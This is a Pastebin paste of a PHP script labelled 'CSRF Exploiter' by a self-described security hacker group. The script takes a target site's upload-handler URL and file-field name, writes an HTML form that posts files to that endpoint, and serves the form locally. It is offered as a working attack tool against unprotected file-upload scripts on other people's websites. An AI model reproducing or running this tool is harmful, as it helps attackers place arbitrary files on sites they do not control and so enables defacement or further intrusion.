Advertisement
Guest User

Untitled

a guest
Oct 15th, 2018
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.31 KB | None | 0 0
  1. <?php
  2. system(clear);
  3.  
  4. print "\e[91m
  5.  
  6.  
  7.  
  8.  
  9. _______ _______ ______ _______ _______ _______ _______ ___ _______ ___ _______ _______ ______
  10. | || || _ | | | | || || || | | || | | || || _ |
  11. | || _____|| | || | ___| | ___||____ || _ || | | _ || | |_ _|| ___|| | ||
  12. | || |_____ | |_||_ | |___ | |___ ____| || |_| || | | | | || | | | | |___ | |_||_
  13. | _||_____ || __ || ___| | ___|| ______|| ___|| |___ | |_| || | | | | ___|| __ |
  14. | |_ _____| || | | || | | |___ | |_____ | | | || || | | | | |___ | | | |
  15. |_______||_______||___| |_||___| |_______||_______||___| |_______||_______||___| |___| |_______||___| |_|
  16.  
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24. \e[93m CSRF Exploiter By
  25. Raymond7 - Garuda Security Hacker\n\n";
  26. echo "\e[92mNote : Post File, Type : Filedata / dzupload /
  27. dzfile / dzfiles / file / ajaxfup / files[] / qqfile /
  28. userfile / etc\n\n";
  29. echo "\e[36mEx : http://site.com/path/upload.php\n";
  30. echo "\e[37mURL : ";
  31. $a = trim(fgets(STDIN));
  32. echo "POST FILE : ";
  33. $b = trim(fgets(STDIN));
  34. $data = "<!DOCTYPE html>
  35. <html>
  36. <head>
  37. <title>CSRF Exploiter By Raymond7</title>
  38. <link href='https://fonts.googleapis.com/css?family=Gloria+Hallelujah' rel='stylesheet'>
  39. <link href='https://fonts.googleapis.com/css?family=Kalam' rel='stylesheet'>
  40.  
  41. </head>
  42. <style type='text/css'>
  43. html {
  44. background-color: black;
  45. color: white;
  46. font-family: Kalam;
  47. }
  48. h1 {
  49. font-family: Gloria Hallelujah;
  50. }
  51.  
  52. </style>
  53. <body>
  54. <center>
  55. <font color='white' face='Gloria Hallelujah' size='7'>CSRF EXPLOITER</font><br>
  56. =============== I N F O ===============<br>
  57. SITE : ".$a."<br>
  58. POST FILE : ".$b."<br>
  59. =======================================<br>
  60. <form method='post' target='_blank' action='".$a."' enctype='multipart/form-data'><input type='file' name='".$b."'><input type='submit' name='file' value='Upload File'></form>
  61. </center>
  62. </body>
  63. </html>";
  64. $c = fopen('index.html', 'a');
  65. fwrite($c, $data);
  66. fclose($c);
  67. echo "Mohon Tunggu...";
  68. sleep(2);
  69. echo "\nSilahkan Buka http://localhost:1337\n";
  70. sleep(3);
  71. system('php -S localhost:1337');
  72. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement